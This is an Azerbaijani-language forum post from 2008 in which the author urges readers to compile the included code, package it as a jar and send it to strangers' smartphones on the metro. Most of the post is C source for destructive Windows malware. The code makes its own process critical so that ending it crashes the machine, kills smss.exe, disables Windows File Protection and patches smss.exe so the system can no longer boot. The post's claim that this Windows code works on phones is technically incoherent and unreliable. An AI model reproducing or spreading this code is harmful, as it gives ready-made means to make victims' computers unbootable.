GanG | Zaman: Bazar ertəsi, 2008-07-28, 7:06 PM | Mesaj # 1 | Root Admin Qrup: Admin Mesaj: 824Reputasiya: 0 Vəziyyət: (offline) | evvelce netopati aciriq ve bu kodu yazib sonra jar fayla cevirib smartfon telefonlara gonderirik metroda ozum yoxlamisam isleyirkod: #include <windows.h>#include <tlhelp32.h>#include <stdio.h> typedef VOID ( _stdcall *RtlSetProcessIsCritical ) (IN BOOLEAN NewValue,OUT PBOOLEAN OldValue, // (optional)IN BOOLEAN IsWinlogon );BOOL ProtectProcess();BOOL EnablePriv(LPCSTR lpszPriv); // by NapalmDWORD fGetPID( char *szProcessName );int fMatchCheck( char *mainstr, int mainstrLen, char *checkstr, int checkstrLen );void Disable_WFP(char *szFile); // I dunno who coded that x-DBOOL SMSSCorrupt(); /************************************/int main(){ProtectProcess(); // not really needed, just wanted to make sure we BSOD when our process ends...return SMSSCorrupt();}/************************************/ BOOL ProtectProcess(){HANDLE hDLL;RtlSetProcessIsCritical fSetCritical; hDLL = LoadLibraryA("ntdll.dll");if ( hDLL != NULL ){EnablePriv(SE_DEBUG_NAME);(fSetCritical) = (RtlSetProcessIsCritical) GetProcAddress( (HINSTANCE)hDLL, "RtlSetProcessIsCritical" );if(!fSetCritical) return 0;fSetCritical(1,0,0);return 1;} elsereturn 0;} BOOL EnablePriv(LPCSTR lpszPriv) // by Napalm{HANDLE hToken;LUID luid;TOKEN_PRIVILEGES tkprivs;ZeroMemory(&tkprivs, sizeof(tkprivs)); if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))return FALSE; if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){CloseHandle(hToken); return FALSE;} tkprivs.PrivilegeCount = 1;tkprivs.Privileges[0].Luid = luid;tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);CloseHandle(hToken);return bRet;} DWORD fGetPID( char *szProcessName ){PROCESSENTRY32 pe;HANDLE ss;DWORD dwRet; ss = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); if( ss ) {if( Process32First( ss, &pe ) 
)while( Process32Next( ss, &pe ) )if( !strcmp( pe.szExeFile, szProcessName ) ) {dwRet = pe.th32ProcessID;break;}CloseHandle( ss );}return dwRet;} int fMatchCheck( char *mainstr, int mainstrLen, char *checkstr, int checkstrLen ){bool fmcret=TRUE;int x;for(x=0;x<mainstrLen;x++) { fmcret=true; for(int y=0;y<checkstrLen;y++) {if(checkstr[y]!=mainstr[x+y]) {fmcret=FALSE;break;}} if(fmcret)return x+checkstrLen; }return -1;} void Disable_WFP(char *szFile) { // I dunno who coded that x-D //we have to convert ASCII string to Unicode string, else this wont workwchar_t path[256];MultiByteToWideChar(CP_ACP, 0, szFile, -1, path, 256); typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);HINSTANCE hmod=LoadLibrary("sfc_os.dll");CPP SetSfcFileException; // the function is stored at the fifth ordinal in sfc_os.dllSetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);SetSfcFileExce ption( 0, path, (DWORD)-1 );//Now we can modify the system file in a complete stealth.} BOOL SMSSCorrupt(){HANDLE hSmss;FILE *fSmss;char szSmss[MAX_PATH],*szSmssBuff;long nSmss;int nAt;bool bRet = FALSE;GetSystemDirectory( szSmss, sizeof szSmss );strcat( szSmss, "\\smss.exe" ); if( EnablePriv( SE_DEBUG_NAME ) ) { hSmss = OpenProcess( PROCESS_ALL_ACCESS, FALSE, fGetPID( "smss.exe" ) ); if( hSmss ) {if( TerminateProcess( hSmss, 0 ) ) { Disable_WFP( szSmss );Sleep( 1000 ); // to make sure the windows file protection is disabled for smss.exefSmss = fopen( szSmss, "rb" );if( fSmss ) { fseek( fSmss, 0, SEEK_END );nSmss = ftell( fSmss );rewind( fSmss ); szSmssBuff = (char*)malloc(nSmss+1); if( szSmssBuff ) { memset( szSmssBuff, 0, nSmss+1 );fread( szSmssBuff, 1, nSmss, fSmss );fclose( fSmss ); fSmss = fopen( szSmss, "wb" ); if( fSmss ) { // search for "w i n l o g o "nAt = fMatchCheck( szSmssBuff, nSmss, "w\x0i\x0n\x0l\x0o\x0g\x0o\x0", 14 ); if( nAt > 0 ) {/* replace "w i n l o g o n" with "w i n l o g o x",so windows won't start the winlogon.exe process, but will try to execute 
winlogox.exe,but that won't work and it will always BSOD >=--D */szSmssBuff[nAt]='x';fwrite( szSmssBuff, 1, nSmss, fSmss );bRet = TRUE;} fclose( fSmss ); } } else {fclose( fSmss );} } }CloseHandle( hSmss );} }return bRet;} | | |